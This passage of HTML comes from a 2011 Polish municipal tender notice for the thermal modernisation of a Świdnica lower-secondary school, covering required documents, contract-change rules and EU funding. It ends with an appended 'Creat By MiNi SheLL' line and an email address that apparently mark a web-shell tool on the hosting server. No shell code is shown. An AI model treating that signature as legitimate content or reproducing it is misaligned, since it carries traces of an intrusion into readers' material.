<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-   Zamawiający dopuszcza realizację zamówienia w systemie podwykonawczym. Wzór wykazu części  
                        zamówienia, których realizację Wykonawca zamierza powierzyć podwykonawcom stanowi załącznik 
                    nr 6 do specyfikacji (zał. nr 6 do oferty Wykonawcy) 
.     Dodatkowo Wykonawca winien do oferty dołączyć:

- zaparafowany projekt umowy - załącznik nr 18 do oferty (wg wzoru nr 10),
- dowód wniesienia wadium - załącznik nr 19 do oferty,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona 
    do reprezentowania Wykonawcy z mocy prawa - załącznik nr 20 do oferty,
- pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 ustawy pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - załącznik nr 21 do oferty,
- dokumenty wskazane w pkt. 1, 9, 10, 11, 12, 13, 14 w przypadku Wykonawców wspólnie ubiegających się o zamówienie- załącznik nr 22 do oferty,
Uwaga:
Załączone do SIWZ harmonogramy rzeczowo-finansowe:
             - harmonogram rzecz. -finansowy - koszty całkowite - załącznik nr 16 do oferty Wykonawcy wg wzoru
               nr 8,
             - harmonogram rzeczowo -finansowy - koszty brutto - miesięcznie - załącznik nr 17 do oferty Wykonawcy
                wg wzoru nr 9,
Wykonawca przedłoży w celu uzgodnienia z Zamawiającym przed podpisaniem umowy.  Podstawą wypełnienia harmonogramów rzeczowo-finansowych będą: oferta Wykonawcy sporządzona na bazie kalkulacji własnej Wykonawcy, kosztorysu szczegółowego oraz uzgodnienia z Zamawiającym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a.	jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b.	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c.	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
-	zawieszenia robót przez Zamawiającego,
-	szczególnie niesprzyjających warunków atmosferycznych,
-	zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub Wykonawcy.

d.	Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku:
	wystąpienia robót nieprzewidzianych w specyfikacji technicznej wykonania i odbioru robót i w projekcie, których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy. 
Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja Wykonawcy pozytywnie zweryfikowana przez inspektora nadzoru oraz Zamawiającego.

e.	Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.
f.	Jeżeli nastąpi zmiana podatku VAT.
Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124 I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124 I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach Programu Operacyjnego Infrastruktura i Środowisko, Priorytet: IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna, Działanie: 9.3: Termomodernizacja obiektów użyteczności publicznej. Termomodernizacja obiektów użyteczności publicznej pełniących funkcje edukacyjne i kulturalne na obszarze Przedgórza Sudeckiego i Niziny Śląskiej Termomodernizacja Gimnazjum nr 1 w Świdnicy ze środków UE w ramach Funduszu Spójności,..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com